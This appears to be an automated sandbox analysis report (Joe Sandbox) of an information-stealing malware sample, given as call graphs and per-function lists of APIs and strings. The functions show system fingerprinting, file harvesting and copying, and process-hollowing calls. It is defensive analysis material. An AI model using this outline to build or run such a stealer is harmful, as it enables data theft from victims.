77299->77300 77301 41058d lstrcpyA 77300->77301 77302 413c98 77301->77302 78168 4115d4 77302->78168 77305 410609 3 API calls 77306 413cb1 77305->77306 77307 41058d lstrcpyA 77306->77307 77308 413cb9 77307->77308 77309 410609 3 API calls 77308->77309 77310 413cd1 77309->77310 77311 41058d lstrcpyA 77310->77311 77312 413cd9 77311->77312 77313 410609 3 API calls 77312->77313 77314 413cf1 77313->77314 77315 41058d lstrcpyA 77314->77315 77316 413cf9 77315->77316 77317 411684 11 API calls 77316->77317 77318 413d09 77317->77318 77319 4105c7 2 API calls 77318->77319 77320 413d16 77319->77320 77321 41058d lstrcpyA 77320->77321 77322 413d1e 77321->77322 77323 410609 3 API calls 77322->77323 77324 413d3e 77323->77324 77325 41058d lstrcpyA 77324->77325 77326 413d46 77325->77326 77327 410609 3 API calls 77326->77327 77328 413d5e 77327->77328 77329 41058d lstrcpyA 77328->77329 77330 413d66 77329->77330 77331 4109a2 19 API calls 77330->77331 77332 413d76 77331->77332 77333 4105c7 2 API calls 77332->77333 77334 413d83 77333->77334 77335 41058d lstrcpyA 77334->77335 77336 413d8b 77335->77336 77337 410609 3 API calls 77336->77337 77338 413dab 77337->77338 77339 41058d lstrcpyA 77338->77339 77340 413db3 77339->77340 77341 410609 3 API calls 77340->77341 77342 413dcb 77341->77342 77343 41058d lstrcpyA 77342->77343 77344 413dd3 77343->77344 77345 413ddb GetCurrentProcessId 77344->77345 78175 41224a OpenProcess 77345->78175 77348 4105c7 2 API calls 77349 413df8 77348->77349 77350 41058d lstrcpyA 77349->77350 77351 413e00 77350->77351 77352 410609 3 API calls 77351->77352 77353 413e20 77352->77353 77354 41058d lstrcpyA 77353->77354 77355 413e28 77354->77355 77356 410609 3 API calls 77355->77356 77357 413e40 77356->77357 77358 41058d lstrcpyA 77357->77358 77359 413e48 77358->77359 77360 410609 3 API calls 77359->77360 77361 413e60 77360->77361 77362 41058d lstrcpyA 77361->77362 77363 413e68 77362->77363 77364 410609 3 API calls 77363->77364 77365 413e80 77364->77365 77366 41058d lstrcpyA 77365->77366 77367 413e88 77366->77367 78182 410b30 GetProcessHeap HeapAlloc 77367->78182 77370 410609 3 API calls 77371 413ea1 77370->77371 77372 41058d lstrcpyA 77371->77372 77373 413ea9 77372->77373 77374 410609 3 API calls 77373->77374 77375 413ec1 77374->77375 77376 41058d lstrcpyA 77375->77376 77377 413ec9 77376->77377 77378 410609 3 API calls 77377->77378 77379 413ee1 77378->77379 77380 41058d lstrcpyA 77379->77380 77381 413ee9 77380->77381 78189 411807 77381->78189 77384 4105c7 2 API calls 77385 413f06 77384->77385 77386 41058d lstrcpyA 77385->77386 77387 413f0e 77386->77387 77388 410609 3 API calls 77387->77388 77389 413f2e 77388->77389 77390 41058d lstrcpyA 77389->77390 77391 413f36 77390->77391 77392 410609 3 API calls 77391->77392 77393 413f4e 77392->77393 77394 41058d lstrcpyA 77393->77394 77395 413f56 77394->77395 78206 411997 77395->78206 77397 413f67 77398 4105c7 2 API calls 77397->77398 77399 413f75 77398->77399 77400 41058d lstrcpyA 77399->77400 77401 413f7d 77400->77401 77402 410609 3 API calls 77401->77402 77403 413f9d 77402->77403 77404 41058d lstrcpyA 77403->77404 77405 413fa5 77404->77405 77406 410609 3 API calls 77405->77406 77407 413fbd 77406->77407 77408 41058d lstrcpyA 77407->77408 77409 413fc5 77408->77409 77410 410c85 3 API calls 77409->77410 77411 413fd2 77410->77411 77412 410609 3 API calls 77411->77412 77413 413fde 77412->77413 77414 41058d lstrcpyA 77413->77414 77415 413fe6 77414->77415 77416 410609 3 API calls 77415->77416 77417 413ffe 77416->77417 77418 41058d lstrcpyA 77417->77418 77419 414006 77418->77419 77420 410609 3 API calls 77419->77420 77421 41401e 77420->77421 77422 41058d lstrcpyA 77421->77422 77423 414026 77422->77423 78221 410c53 GetProcessHeap RtlAllocateHeap GetUserNameA 77423->78221 77425 414033 77426 410609 3 API calls 77425->77426 77427 41403f 77426->77427 77428 41058d lstrcpyA 77427->77428 77429 414047 77428->77429 77430 410609 3 API calls 77429->77430 77431 41405f 77430->77431 77432 41058d lstrcpyA 77431->77432 77433 414067 77432->77433 77434 410609 3 API calls 77433->77434 77435 41407f 77434->77435 77436 41058d lstrcpyA 77435->77436 77437 414087 77436->77437 78222 411563 7 API calls 77437->78222 77440 4105c7 2 API calls 77441 4140a6 77440->77441 77442 41058d lstrcpyA 77441->77442 77443 4140ae 77442->77443 77444 410609 3 API calls 77443->77444 77445 4140ce 77444->77445 77446 41058d lstrcpyA 77445->77446 77447 4140d6 77446->77447 77448 410609 3 API calls 77447->77448 77449 4140ee 77448->77449 77450 41058d lstrcpyA 77449->77450 77451 4140f6 77450->77451 78225 410ddb 77451->78225 77454 4105c7 2 API calls 77455 414113 77454->77455 77456 41058d lstrcpyA 77455->77456 77457 41411b 77456->77457 77458 410609 3 API calls 77457->77458 77459 41413b 77458->77459 77460 41058d lstrcpyA 77459->77460 77461 414143 77460->77461 77462 410609 3 API calls 77461->77462 77463 41415b 77462->77463 77464 41058d lstrcpyA 77463->77464 77465 414163 77464->77465 77466 410cc0 9 API calls 77465->77466 77467 414170 77466->77467 77468 410609 3 API calls 77467->77468 77469 41417c 77468->77469 77470 41058d lstrcpyA 77469->77470 77471 414184 77470->77471 77472 410609 3 API calls 77471->77472 77473 41419c 77472->77473 77474 41058d lstrcpyA 77473->77474 77475 4141a4 77474->77475 77476 410609 3 API calls 77475->77476 77477 4141bc 77476->77477 77478 41058d lstrcpyA 77477->77478 77479 4141c4 77478->77479 78237 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 77479->78237 77482 410609 3 API calls 77483 4141dd 77482->77483 77484 41058d lstrcpyA 77483->77484 77485 4141e5 77484->77485 77486 410609 3 API calls 77485->77486 77487 4141fd 77486->77487 77488 41058d lstrcpyA 77487->77488 77489 414205 77488->77489 77490 410609 3 API calls 77489->77490 77491 41421d 77490->77491 77492 41058d lstrcpyA 77491->77492 77493 414225 77492->77493 77494 410609 3 API calls 77493->77494 77495 41423d 77494->77495 77496 41058d lstrcpyA 77495->77496 77497 414245 77496->77497 78242 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 77497->78242 77499 414252 77500 410609 3 API calls 77499->77500 77501 41425e 77500->77501 77502 41058d lstrcpyA 77501->77502 77503 414266 77502->77503 77504 410609 3 API calls 77503->77504 77505 41427e 77504->77505 77506 41058d lstrcpyA 77505->77506 77507 414286 77506->77507 77508 410609 3 API calls 77507->77508 77509 41429e 77508->77509 77510 41058d lstrcpyA 77509->77510 77511 4142a6 77510->77511 78245 411007 77511->78245 77514 410609 3 API calls 77515 4142bf 77514->77515 77516 41058d lstrcpyA 77515->77516 77517 4142c7 77516->77517 77518 410609 3 API calls 77517->77518 77519 4142df 77518->77519 77520 41058d lstrcpyA 77519->77520 77521 4142e7 77520->77521 77522 410609 3 API calls 77521->77522 77523 4142ff 77522->77523 77524 41058d lstrcpyA 77523->77524 77525 414307 77524->77525 78262 410fba GetSystemInfo wsprintfA 77525->78262 77528 410609 3 API calls 77529 414320 77528->77529 77530 41058d lstrcpyA 77529->77530 77531 414328 77530->77531 77532 410609 3 API calls 77531->77532 77533 414340 77532->77533 77534 41058d lstrcpyA 77533->77534 77535 414348 77534->77535 77536 410609 3 API calls 77535->77536 77537 414360 77536->77537 77538 41058d lstrcpyA 77537->77538 77539 414368 77538->77539 78265 411119 GetProcessHeap HeapAlloc 77539->78265 77542 410609 3 API calls 77543 414381 77542->77543 77544 41058d lstrcpyA 77543->77544 77545 414389 77544->77545 77546 410609 3 API calls 77545->77546 77547 4143a4 77546->77547 77548 41058d lstrcpyA 77547->77548 77549 4143ac 77548->77549 77550 410609 3 API calls 77549->77550 77551 4143c7 77550->77551 77552 41058d lstrcpyA 77551->77552 77553 4143cf 77552->77553 78272 411192 77553->78272 77556 4105c7 2 API calls 77557 4143ef 77556->77557 77558 41058d lstrcpyA 77557->77558 77559 4143f7 77558->77559 77560 410609 3 API calls 77559->77560 77561 41441a 77560->77561 77562 41058d lstrcpyA 77561->77562 77563 414422 77562->77563 77564 410609 3 API calls 77563->77564 77565 41443a 77564->77565 77566 41058d lstrcpyA 77565->77566 77567 414442 77566->77567 78280 4114a5 77567->78280 77570 4105c7 2 API calls 77571 414462 77570->77571 77572 41058d lstrcpyA 77571->77572 77573 41446a 77572->77573 77574 410609 3 API calls 77573->77574 77575 414490 77574->77575 77576 41058d lstrcpyA 77575->77576 77577 414498 77576->77577 77578 410609 3 API calls 77577->77578 77579 4144b3 77578->77579 77580 41058d lstrcpyA 77579->77580 77581 4144bb 77580->77581 78290 411203 77581->78290 77584 4105c7 2 API calls 77585 4144e0 77584->77585 77586 41058d lstrcpyA 77585->77586 77587 4144e8 77586->77587 77588 411203 21 API calls 77587->77588 77589 414509 77588->77589 77590 4105c7 2 API calls 77589->77590 77591 414518 77590->77591 77592 41058d lstrcpyA 77591->77592 77593 414520 77592->77593 77594 410609 3 API calls 77593->77594 77595 414543 77594->77595 77596 41058d lstrcpyA 77595->77596 77597 41454b 77596->77597 77598 401cfd lstrcpyA 77597->77598 77599 414560 lstrlenA 77598->77599 77600 4104e7 lstrcpyA 77599->77600 77601 41457d 77600->77601 78310 416e97 77601->78310 78111->76795 78113 41d016 __setmbcp_nolock 5 API calls 78112->78113 78114 412601 78113->78114 78114->76012 78114->76017 78116 4104e7 lstrcpyA 78115->78116 78117 402a05 78116->78117 78117->76896 78119 4104e7 lstrcpyA 78118->78119 78120 402a16 78119->78120 78120->76896 78122 4104e7 lstrcpyA 78121->78122 78123 402a27 78122->78123 78123->76896 78125 410519 lstrcpyA 78124->78125 78126 416dac 78125->78126 78127 410519 lstrcpyA 78126->78127 78128 416db7 78127->78128 78129 410519 lstrcpyA 78128->78129 78130 416dc2 78129->78130 78130->76897 78131->76896 78132->76896 78133->76896 78135 4116ad 78134->78135 78136 41173c 78134->78136 78138 4104e7 lstrcpyA 78135->78138 78137 4104e7 lstrcpyA 78136->78137 78139 411748 78137->78139 78140 4116c0 _memset 78138->78140 78141 41d016 __setmbcp_nolock 5 API calls 78139->78141 78151 4123d5 lstrcpyA malloc strncpy 78140->78151 78142 411755 78141->78142 78142->76919 78144 4116ea lstrcatA 78152 402920 78144->78152 78146 411707 lstrcatA 78147 411724 78146->78147 78148 4104e7 lstrcpyA 78147->78148 78149 411732 78148->78149 78149->78139 78150->76921 78151->78144 78153 402924 78152->78153 78153->78146 78155 404ac4 78154->78155 78155->78155 78156 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 78155->78156 78157 404b27 78156->78157 78157->76931 78159 427068 78158->78159 78159->77236 78159->78159 78161 40806a LocalAlloc 78160->78161 78162 406724 78160->78162 78161->78162 78163 40807a CryptStringToBinaryA 78161->78163 78162->77100 78162->77111 78163->78162 78164 408091 LocalFree 78163->78164 78164->78162 78166 41d016 __setmbcp_nolock 5 API calls 78165->78166 78167 410d2c 78166->78167 78167->77291 78327 423c10 78168->78327 78170 41160c RegOpenKeyExA 78171 411651 RegCloseKey CharToOemA 78170->78171 78172 411630 RegQueryValueExA 78170->78172 78173 41d016 __setmbcp_nolock 5 API calls 78171->78173 78172->78171 78174 411682 78173->78174 78174->77305 78176 412294 78175->78176 78177 412278 K32GetModuleFileNameExA CloseHandle 78175->78177 78178 4104e7 lstrcpyA 78176->78178 78177->78176 78179 4122a0 78178->78179 78180 41d016 __setmbcp_nolock 5 API calls 78179->78180 78181 4122ae 78180->78181 78181->77348 78329 410c16 78182->78329 78185 410b63 RegOpenKeyExA 78187 410b83 RegQueryValueExA 78185->78187 78188 410b9b RegCloseKey 78185->78188 78186 410b5c 78186->77370 78187->78188 78188->78186 78336 42f109 78189->78336 78191 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 78192 41186b 78191->78192 78193 411873 CoSetProxyBlanket 78192->78193 78196 411964 78192->78196 78199 4118a3 78193->78199 78194 4104e7 lstrcpyA 78195 41198f 78194->78195 78197 42f165 5 API calls 78195->78197 78196->78194 78198 411996 78197->78198 78198->77384 78199->78196 78200 4118d7 VariantInit 78199->78200 78201 4118f6 78200->78201 78337 411757 78201->78337 78203 411901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 78204 4104e7 lstrcpyA 78203->78204 78205 411958 VariantClear 78204->78205 78205->78195 78346 42f09d 78206->78346 78208 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 78209 4119f9 78208->78209 78210 411a01 CoSetProxyBlanket 78209->78210 78213 411a93 78209->78213 78214 411a31 78210->78214 78211 4104e7 lstrcpyA 78212 411abe 78211->78212 78212->77397 78213->78211 78214->78213 78215 411a59 VariantInit 78214->78215 78216 411a78 78215->78216 78347 411d42 LocalAlloc CharToOemW 78216->78347 78218 411a80 78219 4104e7 lstrcpyA 78218->78219 78220 411a87 VariantClear 78219->78220 78220->78212 78221->77425 78223 4104e7 lstrcpyA 78222->78223 78224 4115cd 78223->78224 78224->77440 78226 4104e7 lstrcpyA 78225->78226 78227 410e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 78226->78227 78228 410eed 78227->78228 78236 410e3c 78227->78236 78230 410f05 78228->78230 78231 410ef9 LocalFree 78228->78231 78229 410e42 GetLocaleInfoA 78229->78236 78232 41d016 __setmbcp_nolock 5 API calls 78230->78232 78231->78230 78233 410f15 78232->78233 78233->77454 78234 41058d lstrcpyA 78234->78236 78235 410609 lstrlenA lstrcpyA lstrcatA 78235->78236 78236->78228 78236->78229 78236->78234 78236->78235 78238 410d86 78237->78238 78239 410d6a wsprintfA 78237->78239 78240 41d016 __setmbcp_nolock 5 API calls 78238->78240 78239->78238 78241 410d93 78240->78241 78241->77482 78243 410f94 RegQueryValueExA 78242->78243 78244 410fac RegCloseKey 78242->78244 78243->78244 78244->77499 78246 41107c GetLogicalProcessorInformationEx 78245->78246 78247 411087 78246->78247 78248 411048 GetLastError 78246->78248 78350 411b5b GetProcessHeap HeapFree 78247->78350 78249 4110f3 78248->78249 78250 411057 78248->78250 78256 4110fd 78249->78256 78351 411b5b GetProcessHeap HeapFree 78249->78351 78259 41105b 78250->78259 78252 4110c0 78252->78256 78258 4110c9 wsprintfA 78252->78258 78257 41d016 __setmbcp_nolock 5 API calls 78256->78257 78260 411117 78257->78260 78258->78256 78259->78246 78261 4110ec 78259->78261 78348 411b5b GetProcessHeap HeapFree 78259->78348 78349 411b78 GetProcessHeap HeapAlloc 78259->78349 78260->77514 78261->78256 78263 41d016 __setmbcp_nolock 5 API calls 78262->78263 78264 411005 78263->78264 78264->77528 78352 411b26 78265->78352 78268 41115f wsprintfA 78270 41d016 __setmbcp_nolock 5 API calls 78268->78270 78271 411190 78270->78271 78271->77542 78273 4104e7 lstrcpyA 78272->78273 78279 4111b3 78273->78279 78274 4111df EnumDisplayDevicesA 78275 4111f3 78274->78275 78274->78279 78276 41d016 __setmbcp_nolock 5 API calls 78275->78276 78278 411201 78276->78278 78277 410549 2 API calls 78277->78279 78278->77556 78279->78274 78279->78275 78279->78277 78281 4104e7 lstrcpyA 78280->78281 78282 4114c6 CreateToolhelp32Snapshot Process32First 78281->78282 78283 41154c CloseHandle 78282->78283 78289 4114ee 78282->78289 78284 41d016 __setmbcp_nolock 5 API calls 78283->78284 78286 411561 78284->78286 78285 41153a Process32Next 78285->78283 78285->78289 78286->77570 78287 410609 lstrlenA lstrcpyA lstrcatA 78287->78289 78288 41058d lstrcpyA 78288->78289 78289->78285 78289->78287 78289->78288 78291 4104e7 lstrcpyA 78290->78291 78292 41123b RegOpenKeyExA 78291->78292 78293 411478 78292->78293 78306 411281 78292->78306 78295 410519 lstrcpyA 78293->78295 78294 411287 RegEnumKeyExA 78296 4112c4 wsprintfA RegOpenKeyExA 78294->78296 78294->78306 78297 411489 78295->78297 78299 411460 RegCloseKey 78296->78299 78300 41130a RegQueryValueExA 78296->78300 78304 41d016 __setmbcp_nolock 5 API calls 78297->78304 78298 41145e 78301 41146c RegCloseKey 78298->78301 78299->78301 78302 411440 RegCloseKey 78300->78302 78303 411340 lstrlenA 78300->78303 78301->78293 78302->78306 78303->78302 78303->78306 78305 4114a3 78304->78305 78305->77584 78306->78294 78306->78298 78306->78302 78307 4113b0 RegQueryValueExA 78306->78307 78308 410609 lstrlenA lstrcpyA lstrcatA 78306->78308 78309 41058d lstrcpyA 78306->78309 78307->78302 78307->78306 78308->78306 78309->78306 78311 416ea7 78310->78311 78312 41058d lstrcpyA 78311->78312 78313 416ec4 78312->78313 78314 41058d lstrcpyA 78313->78314 78315 416ee0 78314->78315 78316 41058d lstrcpyA 78315->78316 78328 423c1c 78327->78328 78328->78170 78328->78328 78332 410ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 78329->78332 78331 410b58 78331->78185 78331->78186 78333 410c03 RegCloseKey 78332->78333 78334 410bec RegQueryValueExA 78332->78334 78335 410c13 78333->78335 78334->78333 78335->78331 78336->78191 78345 42f09d 78337->78345 78339 411763 CoCreateInstance 78340 41178b SysAllocString 78339->78340 78341 4117e7 78339->78341 78340->78341 78343 41179a 78340->78343 78341->78203 78342 4117e0 SysFreeString 78342->78341 78343->78342 78344 4117be _wtoi64 SysFreeString 78343->78344 78344->78342 78345->78339 78346->78208 78347->78218 78348->78259 78349->78259 78350->78252 78351->78256 78353 41114d GlobalMemoryStatusEx 78352->78353 78353->78268

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                    • API String ID: 2238633743-2740034357
                                                                                                                                                                    • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                                    • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                                    • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19
                                                                                                                                                                    Function 00414CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 818 414cc8-414d6f call 42e390 wsprintfA FindFirstFileA call 423c10 * 2 825 414d75-414d89 StrCmpCA 818->825 826 41512b-415141 call 401cde call 41d016 818->826 827 4150f8-41510d FindNextFileA 825->827 828 414d8f-414da3 StrCmpCA 825->828 832 41511f-415125 FindClose 827->832 833 41510f-415111 827->833 828->827 830 414da9-414deb wsprintfA StrCmpCA 828->830 834 414e0a-414e1c wsprintfA 830->834 835 414ded-414e08 wsprintfA 830->835 832->826 833->825 837 414e1f-414e5c call 423c10 lstrcatA 834->837 835->837 841 414e82-414e89 strtok_s 837->841 842 414e8b-414ec9 call 423c10 lstrcatA strtok_s 841->842 843 414e5e-414e6f 841->843 847 415089-41508d 842->847 848 414ecf-414edf PathMatchSpecA 842->848 843->847 849 414e75-414e81 843->849 847->827 852 41508f-415095 847->852 850 414ee5-414fbe call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 DeleteFileA CopyFileA call 412166 call 42efc0 848->850 851 414fd9-414fee strtok_s 848->851 849->841 888 414fc0-414fd4 DeleteFileA call 402920 850->888 889 414ff9-415005 850->889 851->848 854 414ff4 851->854 852->832 855 41509b-4150a9 852->855 854->847 855->827 857 4150ab-4150ed call 401cfd call 414cc8 855->857 865 4150f2 857->865 865->827 888->851 890 415116-41511d call 402920 889->890 891 41500b-415031 call 410519 call 407fac 889->891 890->826 900 415033-415077 call 401cfd call 4104e7 call 416e97 call 402920 891->900 901 41507d-415084 call 402920 891->901 900->901 901->847
                                                                                                                                                                    APIs
                                                                                                                                                                    • wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                                    • _memset.LIBCMT ref: 00414D4F
                                                                                                                                                                    • _memset.LIBCMT ref: 00414D60
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                                    • wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                                    • wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                                    • wsprintfA.USER32 ref: 00414E16
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • _memset.LIBCMT ref: 00414E28
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                                    • strtok_s.MSVCRT ref: 00414E82
                                                                                                                                                                    • _memset.LIBCMT ref: 00414E94
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                                                                                    • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0
                                                                                                                                                                      • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
                                                                                                                                                                    • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                    • API String ID: 956187361-332874205
                                                                                                                                                                    • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                                    • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                                                                                    • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55
                                                                                                                                                                    Function 00409D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1437 409d1c-409dd5 call 4104e7 call 4105c7 call 410609 call 41058d call 402920 * 2 call 4104e7 * 2 FindFirstFileA 1454 40a788-40a7d7 call 402920 * 3 call 401cde call 402920 * 3 call 41d016 1437->1454 1455 409ddb-409def StrCmpCA 1437->1455 1457 40a761-40a776 FindNextFileA 1455->1457 1458 409df5-409e09 StrCmpCA 1455->1458 1457->1455 1459 40a77c-40a782 FindClose 1457->1459 1458->1457 1461 409e0f-409e85 call 410549 call 4105c7 call 410609 * 2 call 41058d call 402920 * 3 1458->1461 1459->1454 1492 409e8b-409ea1 StrCmpCA 1461->1492 1493 409f8e-40a002 call 410609 * 4 call 41058d call 402920 * 3 1461->1493 1494 409ea3-409f13 call 410609 * 4 call 41058d call 402920 * 3 1492->1494 1495 409f18-409f8c call 410609 * 4 call 41058d call 402920 * 3 1492->1495 1544 40a008-40a01d call 402920 StrCmpCA 1493->1544 1494->1544 1495->1544 1547 40a023-40a037 StrCmpCA 1544->1547 1548 40a1ef-40a204 StrCmpCA 1544->1548 1547->1548 1551 40a03d-40a173 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA call 4104e7 call 410609 * 2 call 41058d call 402920 * 2 call 410519 call 407fac 1547->1551 1549 40a206-40a249 call 401cfd call 410519 * 3 call 40852e 1548->1549 1550 40a259-40a26e StrCmpCA 1548->1550 1614 40a24e-40a254 1549->1614 1552 40a270-40a281 StrCmpCA 1550->1552 1553 40a2cf-40a2e9 call 410519 call 411d92 1550->1553 1733 40a175-40a1b3 call 401cfd call 410519 call 416e97 call 402920 1551->1733 1734 40a1b8-40a1ea DeleteFileA call 402920 * 3 1551->1734 1556 40a6d0-40a6d7 1552->1556 1557 40a287-40a28b 1552->1557 1584 